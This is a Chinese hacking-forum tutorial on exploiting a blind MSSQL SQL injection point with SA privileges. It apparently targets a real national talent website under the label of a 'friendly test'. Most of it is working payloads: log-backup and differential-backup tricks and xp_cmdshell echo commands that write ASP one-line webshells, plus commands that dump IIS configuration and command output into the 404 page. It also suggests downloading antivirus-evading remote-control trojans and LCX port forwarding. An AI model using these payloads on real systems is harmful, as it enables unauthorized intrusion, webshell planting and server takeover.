sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————

; T/ @/ R; `6 I& U) V* r9 h
                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

+ ^4 b0 ]1 q2 T0 L$ P, _* a7 H                                                                 
8 P1 y" d! a. ?9 j' G' l$ I+ [                                                                 
                                                                  论坛： http://www.90team.net/
* w: A) U- t* x3 j2 F: l9 g; I
, T* E1 K& x( Z! ?

& e# i" A$ E) L, k" u8 Y6 a7 }友情检测国家人才网


内容：MSSQL注入SA权限不显错模式下的入侵
; w7 i9 M! s4 E' l7 r$ c5 \

7 i* v9 J5 f* |( O; V5 D一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
! m  @9 s2 M  T8 J. L8 _# R
/ ]6 ]( x' F% }7 H* @我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

" t0 k  P6 R+ C
$ c1 D- q5 \% a  ~这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
- G/ t- r5 R5 L/ c4 r
. Z$ j3 c& R4 ^$ }5 V: Q思路：

( P- K- X$ K& z! j8 b' F* M# |首先：
2 F4 T4 |( ^; W
! O8 c- G# @. c4 _3 N1 ?通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

; f: c1 U8 Z& h( M3 F1.日志备份获得Webshell
  b5 S3 M3 t* D7 a  b
2.数据库差异备份获得Webshell

$ b! p  n1 b3 U4 _4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来
+ T2 i) {: G: }
0 y- E5 _" N% ]6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
0 V3 L' A4 b$ R; \( i$ {6 W  t


  A5 C; ~% j8 l! i. P( n在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，

我直接演示后面一个方法
/ p/ z5 H* k% w& s9 o! C
) x$ q1 A* \- _
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
- l9 o: g( E) o

! t1 F) ], y5 B% N
1 R. `' M. U& d( @: o
2 N+ _8 @) _+ A3 ^" G( v" D◆日志备份：
. r3 T1 \( {1 k/ r2 U

! U  d0 f3 X$ M5 ~' L) M1. 进行初始备份
6 d5 i: k. p4 H7 f; j$ K; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
. N( o; I7 i+ y4 M
2. 插入数据
/ J: @$ a% K1 s; G6 q# @;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
/ b+ l/ Y6 ~2 t: D& Y/ c2 E2 T1 p/ |
8 U( G" W7 V9 f0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
/ M5 T4 H" T+ z$ _) [- G  
3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
9 L6 W4 k  n2 x/ F! j/ e! f/ \
# L8 ?. p1 T6 |/ p. L9 Y0 k

◆数据库差异备份

1 Z' Y9 w1 |. b! ]! P$ T- @（1. 进行差异备份准备工作
6 @/ b& q7 D, {) ~0 z. a
& ?! K- g& q' |2 e# [3 }7 k5 `# V;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--

上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码


（2. 将数据写入到数据库
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

) v: {( s# ]' L8 N$ z0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
/ F7 L7 F0 g3 P+ I
3. 备份数据库并清理临时文件
7 D4 P* \+ C. x: M' z
3 L0 V7 b0 d+ j2 J" @) r. L2 x;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

2 }: z3 d+ _2 n" X& F. i0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
' [; F) f. N" A' {- \6 Q4 B
# z3 j, v0 U$ J6 \4 M# l) k, {
5 v; h( L& z. ~8 N. s
3 ]% G8 F8 o2 c  }" D8 v用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

5 v% a4 S; [" z- v+ O2 k- b+ ]2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

* D9 s7 e  v7 ^! G: F3 G读取IIS配置信息获取web路径
+ p9 D9 m# d* ]* {5 ?+ g
     
# _4 t8 p6 ?' E9 N     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--

执行命令
     
& X/ _* s: v+ [$ o: X4 M. H! M     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
* |5 w% ?. K0 i


% w$ u: q* V; G/ \% {




; R: _9 t. o( v# ]( ~
9 C- T1 L% v, h" R: b# N- i- t" K+ [
' W1 w% X6 }# H8 z7 v
2 \& x% N  i% e9 Y; l5 [! [; v* f
3 u  h' S. r: ~# k5 V) l
: Q6 C- A" [, k4 x+ ^0 B0 a  x! s, H

3 ]4 o! H7 w4 e' i/ B, y
6 x( m9 |- O4 ?! S
' c$ h2 p: i6 z' i1 i. E* [, Q
! E0 o8 _) n! @) i/ f- n


9 l+ B  }9 o# v9 J/ k8 M
6 O& G" h" ~& i
0 X" S! w2 x+ V% r2 V% _
- t7 d% f' Q. t

& E: c9 L( d$ ?* _
3 _8 j; m+ {( {( `3 H
& R: {8 F* _  S8 {; z% \/ i
# K4 p+ Z) H2 `# y# Y
; T( p' E- L% t4 g: t+ n* M

) q& U" U' _! K9 ~; y6 _+ r& R/ d
! W3 \2 f0 X+ G


7 I+ ~- G$ s! w. F+ i: S/ I
" D  O: B4 c( B: p7 ?
" I. v  U( W7 T- p4 g
3 v9 [! r# S# ?1 h
6 G' n! }" f' i3 A" Z6 `" N3 ?
3 I1 Q. d6 C7 T2 [  _4 ~/ T1 t
; J8 |7 g$ G7 t
; x4 \" d8 Q; b: p
4 i' v, l- r0 O4 q' }



" a* t, N# u! ~8 c- [